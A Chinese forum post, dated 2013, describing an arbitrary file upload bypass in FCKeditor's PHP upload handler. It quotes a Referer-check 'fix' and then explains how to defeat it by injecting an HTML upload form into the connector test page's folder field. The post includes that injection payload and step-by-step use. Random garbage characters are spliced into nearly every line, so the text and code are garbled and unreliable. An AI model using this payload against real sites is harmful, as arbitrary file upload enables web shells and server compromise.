漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
; C- A9 {6 Z8 y1 t& l- f网上给出的修复方案是* |& \3 t: u" G
修复方法,删除FCK编辑器用其他的编辑器
1 q- x& I6 ~ U4 r) U1 [1 ~+ N或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
, [# m: W R+ T" P2 n/ o4 M6 _7 X在) p" g6 p$ c7 I9 A: Q: `1 r( S- |
require(‘config.php’);
7 G5 _, Z) D: M x3 W3 e4 wrequire(‘util.php’);% G7 e$ E3 V$ R+ `
的下面添加以下代码—————————–
9 P# V! j: @( v; T& j//防止外部提交
- A. l! \! `# C3 e; J1 K$ Tfunction outsidepost()* K# }; b! A# V% k3 G `
{1 Y0 v0 ^& @" G+ Z- f4 [
$servername=$_SERVER['SERVER_NAME'];! C# h9 o: ?) `5 E6 z
$sub_from=@$_SERVER['HTTP_REFERER'];' x3 x6 P$ F$ A3 K, Z& S
$sub_len=strlen($servername);
8 k, t) d$ n4 u+ `& T2 w2 c, @$checkfrom=substr($sub_from,7,$sub_len);
: i, F( N& |4 X8 I) z# qif($checkfrom!=$servername){
1 q1 i% @; Y6 J: Z+ a! qecho(“you don’t outsidepost!”);
0 ]! ]2 n4 f* O) S, eexit;5 s4 g& E, S: B! h0 G1 S' k
}: D' ` `* b! q, E( J8 J6 I
}( X( W l, h0 n/ \$ o. D9 ?) F% |6 @
outsidepost();
7 x a9 ^+ I- U8 F$ o防止外部提交,但是没有防止内部提交,
" n+ v( n: J3 S! `: P4 M5 S( b5 p利用方法:
- E7 s; a7 t% q( P7 R; ^* e1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html8 t5 y5 W0 u+ V2 c' j v
2,在Current Folder 框输入
9 K% T4 E0 k! r9 D9 r! s5 E<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
( I! ~ b w0 t# k5 q% @: U然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
; a3 {. E& ?7 ~PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对